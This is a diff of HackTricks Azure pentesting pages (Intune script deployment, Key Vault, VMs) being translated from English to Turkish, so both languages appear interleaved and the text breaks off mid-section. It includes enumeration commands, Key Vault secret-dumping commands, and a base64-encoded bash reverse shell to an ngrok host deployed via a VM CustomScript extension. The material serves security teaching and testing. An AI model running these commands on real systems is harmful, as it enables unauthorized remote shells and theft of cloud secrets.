2. **Cihazlar** -> **Tüm Cihazlar** bölümüne gidin ve Intune'a kayıtlı cihazları kontrol edin.
3. **Scriptler** bölümüne gidin ve Windows 10 için **Ekle**'ye tıklayın.
4. **Powershell scripti** ekleyin.
- ![](<../../../images/image (264).png>)
5. **Atamalar** sayfasında **Tüm kullanıcıları ekle** ve **Tüm cihazları ekle** seçeneklerini belirtin.
1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT
2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune
3. Go to **Scripts** and click on **Add** for Windows 10.
4. Add a **Powershell script**
- ![](<../../../images/image (264).png>)
5. Specify **Add all users** and **Add all devices** in the **Assignments** page.
Scriptin çalıştırılması **bir saate** kadar sürebilir.
The execution of the script can take up to **one hour**.
## References
## Referanslar
- [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune)
{{#include ../../../banners/hacktricks-training.md}}

96
src/pentesting-cloud/azure-security/az-services/keyvault.md
View File

@@ -2,69 +2,66 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
**Azure Key Vault** is a cloud service provided by Microsoft Azure for securely storing and managing sensitive information such as **secrets, keys, certificates, and passwords**. It acts as a centralized repository, offering secure access and fine-grained control using Azure Active Directory (Azure AD). From a security perspective, Key Vault provides **hardware security module (HSM) protection** for cryptographic keys, ensures secrets are encrypted both at rest and in transit, and offers robust access management through **role-based access control (RBAC)** and policies. It also features **audit logging**, integration with Azure Monitor for tracking access, and automated key rotation to reduce risk from prolonged key exposure.
**Azure Key Vault**, Microsoft Azure tarafından sağlanan, **gizli bilgiler, anahtarlar, sertifikalar ve şifreler** gibi hassas bilgileri güvenli bir şekilde depolamak ve yönetmek için kullanılan bir bulut hizmetidir. Merkezi bir depo olarak işlev görür ve Azure Active Directory (Azure AD) kullanarak güvenli erişim ve ince ayar kontrolü sunar. Güvenlik açısından, Key Vault, kriptografik anahtarlar için **donanım güvenlik modülü (HSM) koruması** sağlar, gizli bilgilerin hem dinlenme hem de iletim sırasında şifrelenmesini garanti eder ve **rol tabanlı erişim kontrolü (RBAC)** ve politikalar aracılığıyla sağlam erişim yönetimi sunar. Ayrıca **denetim günlüğü**, erişimi izlemek için Azure Monitor ile entegrasyon ve uzun süreli anahtar maruziyetinden kaynaklanan riski azaltmak için otomatik anahtar döngüsü özelliklerine sahiptir.
See [Azure Key Vault REST API overview](https://learn.microsoft.com/en-us/azure/key-vault/general/about-keys-secrets-certificates) for complete details.
Tam detaylar için [Azure Key Vault REST API genel bakışını](https://learn.microsoft.com/en-us/azure/key-vault/general/about-keys-secrets-certificates) inceleyin.
According to the [**docs**](https://learn.microsoft.com/en-us/azure/key-vault/general/basic-concepts), Vaults support storing software and HSM-backed keys, secrets, and certificates. Managed HSM pools only support HSM-backed keys.
[**Belgeler**](https://learn.microsoft.com/en-us/azure/key-vault/general/basic-concepts) göre, Vault'lar yazılım ve HSM destekli anahtarlar, gizli bilgiler ve sertifikalar depolamayı destekler. Yönetilen HSM havuzları yalnızca HSM destekli anahtarları destekler.
The **URL format** for **vaults** is `https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}` and for managed HSM pools it's: `https://{hsm-name}.managedhsm.azure.net/{object-type}/{object-name}/{object-version}`
**Vault'lar** için **URL formatı** `https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}` ve yönetilen HSM havuzları için: `https://{hsm-name}.managedhsm.azure.net/{object-type}/{object-name}/{object-version}` şeklindedir.
Where:
Burada:
- `vault-name` is the globally **unique** name of the key vault
- `object-type` can be "keys", "secrets" or "certificates"
- `object-name` is **unique** name of the object within the key vault
- `object-version` is system generated and optionally used to address a **unique version of an object**.
- `vault-name`, anahtar kasasının küresel olarak **benzersiz** adıdır.
- `object-type`, "keys", "secrets" veya "certificates" olabilir.
- `object-name`, anahtar kasası içindeki nesnenin **benzersiz** adıdır.
- `object-version`, sistem tarafından üretilir ve isteğe bağlı olarak **bir nesnenin benzersiz versiyonuna** erişmek için kullanılır.
In order to access to the secrets stored in the vault it's possible to select between 2 permissions models when creating the vault:
Kasada depolanan gizli bilgilere erişmek için kasayı oluştururken 2 izin modeli arasında seçim yapmak mümkündür:
- **Vault access policy**
- **Azure RBAC** (most common and recommended)
- You can find all the granular permissions supported in [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault)
- **Vault erişim politikası**
- **Azure RBAC** (en yaygın ve önerilen)
- Desteklenen tüm ayrıntılı izinleri [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault) adresinde bulabilirsiniz.
### Access Control <a href="#access-control" id="access-control"></a>
### Erişim Kontrolü <a href="#access-control" id="access-control"></a>
Access to a Key Vault resource is controlled by two planes:
Bir Key Vault kaynağına erişim, iki düzlemle kontrol edilir:
- The **management plane**, whose target is [management.azure.com](http://management.azure.com/).
- It's used to manage the key vault and **access policies**. Only Azure role based access control (**RBAC**) is supported.
- The **data plane**, whose target is **`<vault-name>.vault.azure.com`**.
- It's used to manage and access the **data** (keys, secrets and certificates) **in the key vault**. This supports **key vault access policies** or Azure **RBAC**.
- **Yönetim düzlemi**, hedefi [management.azure.com](http://management.azure.com/) olan.
- Anahtar kasasını ve **erişim politikalarını** yönetmek için kullanılır. Sadece Azure rol tabanlı erişim kontrolü (**RBAC**) desteklenir.
- **Veri düzlemi**, hedefi **`<vault-name>.vault.azure.com`** olan.
- Anahtar kasasındaki **verileri** (anahtarlar, gizli bilgiler ve sertifikalar) yönetmek ve erişmek için kullanılır. Bu, **anahtar kasası erişim politikalarını** veya Azure **RBAC**'yi destekler.
A role like **Contributor** that has permissions in the management place to manage access policies can get access to the secrets by modifying the access policies.
Erişim politikalarını yönetmek için yönetim düzleminde izinleri olan **Katkıda Bulunan** gibi bir rol, erişim politikalarını değiştirerek gizli bilgilere erişim elde edebilir.
### Key Vault RBAC Built-In Roles <a href="#rbac-built-in-roles" id="rbac-built-in-roles"></a>
### Key Vault RBAC Yerleşik Rolleri <a href="#rbac-built-in-roles" id="rbac-built-in-roles"></a>
<figure><img src="../../../images/image (27).png" alt=""><figcaption></figcaption></figure>
### Network Access
### Ağ Erişimi
In Azure Key Vault, **firewall** rules can be set up to **allow data plane operations only from specified virtual networks or IPv4 address ranges**. This restriction also affects access through the Azure administration portal; users will not be able to list keys, secrets, or certificates in a key vault if their login IP address is not within the authorized range.
For analyzing and managing these settings, you can use the **Azure CLI**:
Azure Key Vault'ta, **veri düzlemi işlemlerine yalnızca belirtilen sanal ağlardan veya IPv4 adres aralıklarından izin vermek için** güvenlik duvarı kuralları ayarlanabilir. Bu kısıtlama, Azure yönetim portalı üzerinden erişimi de etkiler; kullanıcılar, giriş IP adresleri yetkilendirilmiş aralıkta değilse bir anahtar kasasındaki anahtarları, gizli bilgileri veya sertifikaları listeleyemezler.
Bu ayarları analiz etmek ve yönetmek için **Azure CLI**'yi kullanabilirsiniz:
```bash
az keyvault show --name name-vault --query networkAcls
```
The previous command will display the f**irewall settings of `name-vault`**, including enabled IP ranges and policies for denied traffic.
Moreover, it's possible to create a **private endpoint** to allow a private connection to a vault.
Ayrıca, bir vault'a özel bir bağlantı sağlamak için **özel bir uç nokta** oluşturmak mümkündür.
### Deletion Protection
### Silme Koruması
When a key vault is created the minimum number of days to allow for deletion is 7. Which means that whenever you try to delete that key vault it'll need **at least 7 days to be deleted**.
Bir anahtar vault'u oluşturulduğunda, silme için izin verilen minimum gün sayısı 7'dir. Bu, o anahtar vault'unu silmeye çalıştığınızda **silinmesi için en az 7 gün gerektiği** anlamına gelir.
However, it's possible to create a vault with **purge protection disabled** which allow key vault and objects to be purged during retention period. Although, once this protection is enabled for a vault it cannot be disabled.
Ancak, anahtar vault'unu ve nesneleri saklama süresi boyunca silinmesine izin veren **temizleme koruması devre dışı** bırakılmış bir vault oluşturmak mümkündür. Ancak, bu koruma bir vault için etkinleştirildiğinde devre dışı bırakılamaz.
## Enumeration
## Sayım
{{#tabs }}
{{#tab name="az" }}
```bash
# List all Key Vaults in the subscription
az keyvault list
@@ -92,11 +89,9 @@ az keyvault secret show --vault-name <KeyVaultName> --name <SecretName>
# Get old versions secret value
az keyvault secret show --id https://<KeyVaultName>.vault.azure.net/secrets/<KeyVaultName>/<idOldVersion>
```
{{#endtab }}
{{#tab name="Az Powershell" }}
```powershell
# Get keyvault token
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
@@ -120,11 +115,9 @@ Get-AzKeyVault -VaultName <KeyVaultName> -InRemovedState
# Get secret values
Get-AzKeyVaultSecret -VaultName <vault_name> -Name <secret_name> -AsPlainText
```
{{#endtab }}
{{#tab name="az script" }}
```bash
#!/bin/bash
@@ -151,38 +144,33 @@ echo "Vault Name,Associated Resource Group" > $CSV_OUTPUT
# Iterate over each resource group
for GROUP in $AZ_RESOURCE_GROUPS
do
# Fetch key vaults within the current resource group
VAULT_LIST=$(az keyvault list --resource-group $GROUP --query "[].name" -o tsv)
# Fetch key vaults within the current resource group
VAULT_LIST=$(az keyvault list --resource-group $GROUP --query "[].name" -o tsv)
# Process each key vault
for VAULT in $VAULT_LIST
do
# Extract the key vault's name
VAULT_NAME=$(az keyvault show --name $VAULT --resource-group $GROUP --query "name" -o tsv)
# Process each key vault
for VAULT in $VAULT_LIST
do
# Extract the key vault's name
VAULT_NAME=$(az keyvault show --name $VAULT --resource-group $GROUP --query "name" -o tsv)
# Append the key vault name and its resource group to the file
echo "$VAULT_NAME,$GROUP" >> $CSV_OUTPUT
done
# Append the key vault name and its resource group to the file
echo "$VAULT_NAME,$GROUP" >> $CSV_OUTPUT
done
done
```
{{#endtab }}
{{#endtabs }}
## Privilege Escalation
## Yetki Yükseltme
{{#ref}}
../az-privilege-escalation/az-key-vault-privesc.md
{{#endref}}
## Post Exploitation
## İstismar Sonrası
{{#ref}}
../az-post-exploitation/az-key-vault-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

476
src/pentesting-cloud/azure-security/az-services/vms/README.md
View File

@@ -1,61 +1,60 @@
# Az - Virtual Machines & Network
# Az - Sanal Makineler & Ağ
{{#include ../../../../banners/hacktricks-training.md}}
## Azure Networking Basic Info
## Azure Ağ Temel Bilgileri
Azure networks contains **different entities and ways to configure it.** You can find a brief **descriptions,** **examples** and **enumeration** commands of the different Azure network entities in:
Azure ağları **farklı varlıklar ve yapılandırma yolları** içerir. Farklı Azure ağ varlıklarının **kısa açıklamaları,** **örnekleri** ve **numaralandırma** komutlarını bulabilirsiniz:
{{#ref}}
az-azure-network.md
{{#endref}}
## VMs Basic information
## VM'ler Temel Bilgileri
Azure Virtual Machines (VMs) are flexible, on-demand **cloud-based servers that let you run Windows or Linux operating systems**. They allow you to deploy applications and workloads without managing physical hardware. Azure VMs can be configured with various CPU, memory, and storage options to meet specific needs and integrate with Azure services like virtual networks, storage, and security tools.
Azure Sanal Makineleri (VM'ler), **Windows veya Linux işletim sistemlerini çalıştırmanıza olanak tanıyan esnek, talep üzerine bulut tabanlı sunuculardır.** Fiziksel donanım yönetmeden uygulamaları ve iş yüklerini dağıtmanıza olanak tanır. Azure VM'leri, belirli ihtiyaçları karşılamak ve sanal ağlar, depolama ve güvenlik araçları gibi Azure hizmetleriyle entegre olmak için çeşitli CPU, bellek ve depolama seçenekleriyle yapılandırılabilir.
### Security Configurations
### Güvenlik Yapılandırmaları
- **Availability Zones**: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters.
- **Security Type**:
- **Standard Security**: This is the default security type that does not require any specific configuration.
- **Trusted Launch**: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM).
- **Confidential VMs**: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and [**more**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
- **Authentication**: By default a new **SSH key is generated**, although it's possible to use a public key or use a previous key and the username by default is **azureuser**. It's also possible to configure to use a **password.**
- **VM disk encryption:** The disk is encrypted at rest by default using a platform managed key.
- It's also possible to enable **Encryption at host**, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
- **NIC network security group**:
- **None**: Basically opens every port
- **Basic**: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389)
- **Advanced**: Select a security group
- **Backup**: It's possible to enable **Standard** backup (one a day) and **Enhanced** (multiple per day)
- **Patch orchestration options**: This enable to automatically apply patches in the VMs according to the selected policy as described in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching).
- **Alerts**: It's possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules:
- Percentage CPU is greater than 80%
- Available Memory Bytes is less than 1GB
- Data Disks IOPS Consumed Percentage is greater than 95%
- OS IOPS Consumed Percentage is greater than 95%
- Network in Total is greater than 500GB
- Network Out Total is greater than 200GB
- VmAvailabilityMetric is less than 1
- **Heath monitor**: By default check protocol HTTP in port 80
- **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock).
- Most VM related resources **also support locks** like disks, snapshots...
- Locks can also be applied at **resource group and subscription levels**
- **Kullanılabilirlik Alanları**: Kullanılabilirlik alanları, belirli bir Azure bölgesindeki fiziksel olarak ayrılmış veri merkezi gruplarıdır ve yerel kesintiler veya felaketlerden etkilenen birden fazla alan riskini en aza indirmek için tasarlanmıştır.
- **Güvenlik Türü**:
- **Standart Güvenlik**: Bu, herhangi bir özel yapılandırma gerektirmeyen varsayılan güvenlik türüdür.
- **Güvenilir Başlatma**: Bu güvenlik türü, Güvenli Başlatma ve Sanal Güvenilir Platform Modülü (vTPM) kullanarak önyükleme kitleri ve çekirdek düzeyindeki kötü amaçlı yazılımlara karşı korumayı artırır.
- **Gizli VM'ler**: Güvenilir başlatmanın üzerine, VM, hipervizör ve ana yönetim arasında donanım tabanlı izolasyon sunar, disk şifrelemesini geliştirir ve [**daha fazlası**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
- **Kimlik Doğrulama**: Varsayılan olarak yeni bir **SSH anahtarı oluşturulur**, ancak bir genel anahtar kullanmak veya önceki bir anahtarı ve varsayılan olarak **azureuser** olan kullanıcı adını kullanmak mümkündür. Ayrıca **şifre** kullanacak şekilde yapılandırmak da mümkündür.
- **VM disk şifrelemesi:** Disk, varsayılan olarak platform yönetilen bir anahtar kullanılarak dinlenme durumunda şifrelenir.
- **Ana bilgisayarda Şifreleme**'yi etkinleştirmek de mümkündür; burada veriler, depolama hizmetine gönderilmeden önce ana bilgisayarda şifrelenir ve ana bilgisayar ile depolama hizmeti arasında uçtan uca şifreleme sağlanır ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
- **NIC ağ güvenlik grubu**:
- **Hiçbiri**: Temelde her portu açar
- **Temel**: HTTP (80), HTTPS (443), SSH (22), RDP (3389) gelen portlarını kolayca açar
- **Gelişmiş**: Bir güvenlik grubu seçin
- **Yedekleme**: **Standart** yedeklemeyi (günde bir) ve **Gelişmiş** (günde birden fazla) etkinleştirmek mümkündür.
- **Yamanın Orkestrasyon Seçenekleri**: Bu, seçilen politikaya göre VM'lerde yamaların otomatik olarak uygulanmasını sağlar, [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching) olarak açıklanmıştır.
- **Uyarılar**: VM'de bir şey olduğunda otomatik olarak e-posta veya mobil uygulama ile uyarı almak mümkündür. Varsayılan kurallar:
- CPU Yüzdesi %80'den büyük
- Kullanılabilir Bellek Baytları 1GB'dan az
- Veri Diskleri IOPS Tüketilen Yüzdesi %95'ten büyük
- OS IOPS Tüketilen Yüzdesi %95'ten büyük
- Toplam Ağ 500GB'dan büyük
- Toplam Ağ Çıkışı 200GB'dan büyük
- VmAvailabilityMetric 1'den az
- **Sağlık monitörü**: Varsayılan olarak port 80'de HTTP protokolünü kontrol eder
- **Kilitlemeler**: Bir VM'yi yalnızca okunabilir (**ReadOnly** kilidi) veya okunabilir ve güncellenebilir ancak silinemez (**CanNotDelete** kilidi) hale getirmek için kilitleme sağlar.
- Çoğu VM ile ilgili kaynak **aynı zamanda kilitlemeleri destekler**; diskler, anlık görüntüler...
- Kilitlemeler **kaynak grubu ve abonelik seviyelerinde** de uygulanabilir.
## Disks & snapshots
## Diskler & Anlık Görüntüler
- It's possible to **enable to attach a disk to 2 or more VMs**
- By default every disk is **encrypted** with a platform key.
- Same in snapshots
- By default it's possible to **share the disk from all networks**, but it can also be **restricted** to only certain **private acces**s or to **completely disable** public and private access.
- Same in snapshots
- It's possible to **generate a SAS URI** (of max 60days) to **export the disk**, which can be configured to require authentication or not
- Same in snapshots
- **2 veya daha fazla VM'ye disk eklemeyi etkinleştirmek mümkündür**
- Varsayılan olarak her disk **şifrelenmiştir** ve bir platform anahtarı kullanır.
- Anlık görüntülerde de aynı
- Varsayılan olarak, diskin **tüm ağlardan paylaşılması mümkündür**, ancak yalnızca belirli **özel erişim** ile **kısıtlanabilir** veya genel ve özel erişimi **tamamen devre dışı bırakabilir**.
- Anlık görüntülerde de aynı
- **Diskin dışa aktarılması için bir SAS URI** (maksimum 60 gün) **oluşturmak mümkündür**, bu da kimlik doğrulama gerektirip gerektirmeyecek şekilde yapılandırılabilir.
- Anlık görüntülerde de aynı
{{#tabs}}
{{#tab name="az cli"}}
```bash
# List all disks
az disk list --output table
@@ -63,10 +62,8 @@ az disk list --output table
# Get info about a disk
az disk show --name <disk-name> --resource-group <rsc-group>
```
{{#endtab}}
{{#tab name="PowerShell"}}
```powershell
# List all disks
Get-AzDisk
@@ -74,20 +71,18 @@ Get-AzDisk
# Get info about a disk
Get-AzDisk -Name <DiskName> -ResourceGroupName <ResourceGroupName>
```
{{#endtab}}
{{#endtabs}}
## Images, Gallery Images & Restore points
## Görseller, Galeri Görselleri ve Geri Yükleme Noktaları
A **VM image** is a template that contains the operating system, application settings and filesystem needed to **create a new virtual machine (VM)**. The difference between an image and a disk snapshot is that a disk snapshot is a read-only, point-in-time copy of a single managed disk, used primarily for backup or troubleshooting, while an image can contain **multiple disks and is designed to serve as a template for creating new VMs**.\
Images can be managed in the **Images section** of Azure or inside **Azure compute galleries** which allows to generate **versions** and **share** the image cross-tenant of even make it public.
Bir **VM görüntüsü**, **yeni bir sanal makine (VM)** oluşturmak için gereken işletim sistemi, uygulama ayarları ve dosya sistemi içeren bir şablondur. Bir görüntü ile bir disk anlık görüntüsü arasındaki fark, bir disk anlık görüntüsünün yalnızca yedekleme veya sorun giderme için kullanılan, tek bir yönetilen diskin okunamayan, belirli bir zamandaki kopyası olmasıdır; oysa bir görüntü **birden fazla diski içerebilir ve yeni VMs oluşturmak için bir şablon olarak hizmet vermek üzere tasarlanmıştır**.\
Görüntüler, Azure'un **Görüntüler bölümünde** veya **Azure hesap galerileri** içinde yönetilebilir; bu, **sürümler** oluşturmayı ve görüntüyü tenantlar arası paylaşmayı veya hatta herkese açık hale getirmeyi sağlar.
A **restore point** stores the VM configuration and **point-in-time** application-consistent **snapshots of all the managed disks** attached to the VM. It's related to the VM and its purpose is to be able to restore that VM to how it was in that specific point in it.
Bir **geri yükleme noktası**, VM yapılandırmasını ve VM'ye bağlı olan **tüm yönetilen disklerin** **belirli bir zamandaki** uygulama tutarlı **anlık görüntülerini** saklar. Bu, VM ile ilişkilidir ve amacı, o VM'yi o belirli zamandaki durumuna geri yükleyebilmektir.
{{#tabs}}
{{#tab name="az cli"}}
```bash
# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
@@ -119,10 +114,8 @@ az image list --output table
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>
```
{{#endtab}}
{{#tab name="PowerShell"}}
```powershell
## List all galleries and get info about one
Get-AzGallery
@@ -146,73 +139,67 @@ Get-AzImage -Name <ResourceName> -ResourceGroupName <ResourceGroupName>
## List all restore points and get info about 1
Get-AzRestorePointCollection -Name <CollectionName> -ResourceGroupName <ResourceGroupName>
```
{{#endtab}}
{{#endtabs}}
## Azure Site Recovery
From the [**docs**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview): Site Recovery helps ensure business continuity by keeping business apps and workloads running during outages. Site Recovery **replicates workloads** running on physical and virtual machines (VMs) from a primary site to a secondary location. When an outage occurs at your primary site, you fail over to a secondary location, and access apps from there. After the primary location is running again, you can fail back to it.
[**Belgeler**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview) sayfasından: Site Recovery, iş sürekliliğini sağlamak için iş uygulamalarını ve iş yüklerini kesintiler sırasında çalışır durumda tutmaya yardımcı olur. Site Recovery, fiziksel ve sanal makinelerde (VM'ler) çalışan iş yüklerini birincil bir yerden ikincil bir yere **çoğaltır**. Bir kesinti meydana geldiğinde, birincil yerden ikincil bir yere geçiş yapar ve uygulamalara oradan erişirsiniz. Birincil yer tekrar çalışmaya başladığında, geri geçiş yapabilirsiniz.
## Azure Bastion
Azure Bastion enables secure and seamless **Remote Desktop Protocol (RDP)** and **Secure Shell (SSH)** access to your virtual machines (VMs) directly through the Azure Portal or via a jump box. By **eliminating the need for public IP addresses** on your VMs.
Azure Bastion, sanal makinelerinize (VM'ler) doğrudan Azure Portal üzerinden veya bir jump box aracılığıyla güvenli ve kesintisiz **Uzak Masaüstü Protokolü (RDP)** ve **Güvenli Kabuk (SSH)** erişimi sağlar. Bu, VM'lerinizde **genel IP adreslerine ihtiyaç duymayı ortadan kaldırır**.
The Bastion deploys a subnet called **`AzureBastionSubnet`** with a `/26` netmask in the VNet it needs to work on. Then, it allows to **connect to internal VMs through the browser** using `RDP` and `SSH` avoiding exposing ports of the VMs to the Internet. It can also work as a **jump host**.
Bastion, çalışması gereken VNet içinde `/26` alt ağ maskesi ile **`AzureBastionSubnet`** adında bir alt ağ dağıtır. Ardından, VM'lerin portlarını İnternete açmadan `RDP` ve `SSH` kullanarak tarayıcı üzerinden iç VM'lere **bağlanmayı** sağlar. Ayrıca bir **jump host** olarak da çalışabilir.
To list all Azure Bastion Hosts in your subscription and connect to VMs through them, you can use the following commands:
Aboneliğinizdeki tüm Azure Bastion Host'larını listelemek ve bunlar aracılığıyla VM'lere bağlanmak için aşağıdaki komutları kullanabilirsiniz:
{{#tabs}}
{{#tab name="az cli"}}
```bash
# List bastions
az network bastion list -o table
# Connect via SSH through bastion
az network bastion ssh \
--name MyBastion \
--resource-group MyResourceGroup \
--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
--auth-type ssh-key \
--username azureuser \
--ssh-key ~/.ssh/id_rsa
--name MyBastion \
--resource-group MyResourceGroup \
--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
--auth-type ssh-key \
--username azureuser \
--ssh-key ~/.ssh/id_rsa
# Connect via RDP through bastion
az network bastion rdp \
--name <BASTION_NAME> \
--resource-group <RESOURCE_GROUP> \
--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
--auth-type password \
--username <VM_USERNAME> \
--password <VM_PASSWORD>
--name <BASTION_NAME> \
--resource-group <RESOURCE_GROUP> \
--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
--auth-type password \
--username <VM_USERNAME> \
--password <VM_PASSWORD>
```
{{#endtab}}
{{#tab name="PowerShell"}}
```powershell
# List bastions
Get-AzBastion
```
{{#endtab}}
{{#endtabs}}
## Metadata
The Azure Instance Metadata Service (IMDS) **provides information about running virtual machine instances** to assist with their management and configuration. It offers details such as the SKU, storage, network configurations, and information about upcoming maintenance events via **REST API available at the non-routable IP address 169.254.169.254**, which is accessible only from within the VM. Communication between the VM and IMDS stays within the host, ensuring secure access. When querying IMDS, HTTP clients inside the VM should bypass web proxies to ensure proper communication.
Azure Instance Metadata Service (IMDS) **çalışan sanal makine örnekleri hakkında bilgi sağlar** yönetim ve yapılandırmalarına yardımcı olmak için. SKU, depolama, ağ yapılandırmaları ve yaklaşan bakım olayları hakkında bilgiler gibi ayrıntılar sunar **REST API, 169.254.169.254 adresindeki yönlendirilemeyen IP adresinde mevcuttur**, bu yalnızca VM içinden erişilebilir. VM ile IMDS arasındaki iletişim, güvenli erişimi sağlamak için ana bilgisayar içinde kalır. IMDS'yi sorgularken, VM içindeki HTTP istemcileri doğru iletişimi sağlamak için web proxy'lerini atlamalıdır.
Moreover, to contact the metadata endpoint, the HTTP request must have the header **`Metadata: true`** and must not have the header **`X-Forwarded-For`**.
Ayrıca, metadata uç noktasına ulaşmak için HTTP isteğinin **`Metadata: true`** başlığına sahip olması ve **`X-Forwarded-For`** başlığına sahip olmaması gerekir.
Check how to enumerate it in:
Bunu nasıl listeleyeceğinizi kontrol edin:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm
{{#endref}}
## VM Enumeration
```bash
# VMs
## List all VMs and get info about one
@@ -234,8 +221,8 @@ az vm extension list -g <rsc-group> --vm-name <vm-name>
## List managed identities in a VM
az vm identity show \
--resource-group <rsc-group> \
--name <vm-name>
--resource-group <rsc-group> \
--name <vm-name>
# Disks
## List all disks and get info about one
@@ -440,22 +427,20 @@ Get-AzStorageAccount
Get-AzVMExtension -VMName <VmName> -ResourceGroupName <ResourceGroupName>
```
## VMs'de Kod Çalıştırma
## Code Execution in VMs
### VM Uzantıları
### VM Extensions
Azure VM uzantıları, Azure sanal makinelerinde (VM'lerde) **dağıtım sonrası yapılandırma** ve otomasyon görevleri sağlayan küçük uygulamalardır.
Azure VM extensions are small applications that provide **post-deployment configuration** and automation tasks on Azure virtual machines (VMs).
Bu, **VM'ler içinde rastgele kod çalıştırmaya** olanak tanır.
This would allow to **execute arbitrary code inside VMs**.
Gerekli izin **`Microsoft.Compute/virtualMachines/extensions/write`**'dir.
The required permission is **`Microsoft.Compute/virtualMachines/extensions/write`**.
It's possible to list all the available extensions with:
Tüm mevcut uzantıları listelemek mümkündür:
{{#tabs }}
{{#tab name="Az Cli" }}
```bash
# It takes some mins to run
az vm extension image list --output table
@@ -463,25 +448,21 @@ az vm extension image list --output table
# Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table
```
{{#endtab }}
{{#tab name="PowerShell" }}
```powershell
# It takes some mins to run
Get-AzVMExtensionImage -Location <Location> -PublisherName <PublisherName> -Type <Type>
```
{{#endtab }}
{{#endtabs }}
It's possible to **run custom extensions that runs custom code**:
Özel kod çalıştıran **özel uzantılar çalıştırmak mümkündür**:
{{#tabs }}
{{#tab name="Linux" }}
- Execute a revers shell
- Ters kabuk çalıştırın
```bash
# Prepare the rev shell
echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
@@ -489,122 +470,110 @@ YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==
# Execute rev shell
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
```
- Execute a script located on the internet
- İnternette bulunan bir scripti çalıştırın
```bash
az vm extension set \
--resource-group rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
--resource-group rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
```
{{#endtab }}
{{#tab name="Windows" }}
- Execute a reverse shell
- Ters bir shell çalıştırın
```bash
# Get encoded reverse shell
